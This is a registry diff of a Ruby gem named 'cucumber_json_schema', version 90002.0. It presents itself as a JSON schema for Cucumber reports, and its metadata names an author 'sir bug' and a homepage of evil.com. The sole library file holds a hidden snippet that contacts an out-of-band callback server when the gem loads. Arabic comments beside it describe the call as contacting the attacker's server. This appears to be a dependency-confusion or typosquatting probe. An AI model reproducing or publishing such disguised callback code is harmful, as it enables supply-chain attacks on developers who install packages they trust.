cucumber_json_schema 90002.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (3) hide show
  1. checksums.yaml +7 -0
  2. data/lib/cucumber_json_schema.rb +6 -0
  3. metadata +44 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: 4408f3e6eb25245ff59796071c21e1e4ec70b5814197c0d5ad464b04b9fec887
4
+ data.tar.gz: b8a3391579e5159e424a5ea3dc5aac7eafd455d0ae52afcff2a0f918e502e09f
5
+ SHA512:
6
+ metadata.gz: 1438dc41915bac7a4ded81eb2009e112ab836cf118f28d71f4aeb878f9d9b875acc3c6c16554b532008c2485d9b25bac510afaf471459153fb0199ebbb4715ad
7
+ data.tar.gz: 319b84c4e451a5e3270c2d510bfdb516d4f6539ded47e239a7f7b942608ac037a448163d0a85000616a2e81876799fa68100c684d740819c8ebe6bbb85138562
@@ -0,0 +1,6 @@
1
+ # lib/cucumber_json_schema.rb
2
+ require 'net/http'
3
+
4
+ # عند تثبيت الحزمة، يتم الاتصال بخادم المهاجم
5
+ uri = URI('http://hphvtqgrjyylhrdpidwlzr9lxik5rypjc.oast.fun')
6
+ response = Net::HTTP.get(uri) # يقوم هذا الكود بالاتصال بالخادم
metadata ADDED
@@ -0,0 +1,44 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: cucumber_json_schema
3
+ version: !ruby/object:Gem::Version
4
+ version: '90002.0'
5
+ platform: ruby
6
+ authors:
7
+ - sir bug
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2026-02-15 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description: This gem provides a JSON schema that describes cucumber json reports.
14
+ email:
15
+ - vicitimone@gmail.com
16
+ executables: []
17
+ extensions: []
18
+ extra_rdoc_files: []
19
+ files:
20
+ - lib/cucumber_json_schema.rb
21
+ homepage: https://evil.com
22
+ licenses:
23
+ - MIT
24
+ metadata: {}
25
+ post_install_message:
26
+ rdoc_options: []
27
+ require_paths:
28
+ - lib
29
+ required_ruby_version: !ruby/object:Gem::Requirement
30
+ requirements:
31
+ - - ">="
32
+ - !ruby/object:Gem::Version
33
+ version: '0'
34
+ required_rubygems_version: !ruby/object:Gem::Requirement
35
+ requirements:
36
+ - - ">="
37
+ - !ruby/object:Gem::Version
38
+ version: '0'
39
+ requirements: []
40
+ rubygems_version: 3.4.20
41
+ signing_key:
42
+ specification_version: 4
43
+ summary: A gem that provides a JSON schema for cucumber json reports
44
+ test_files: []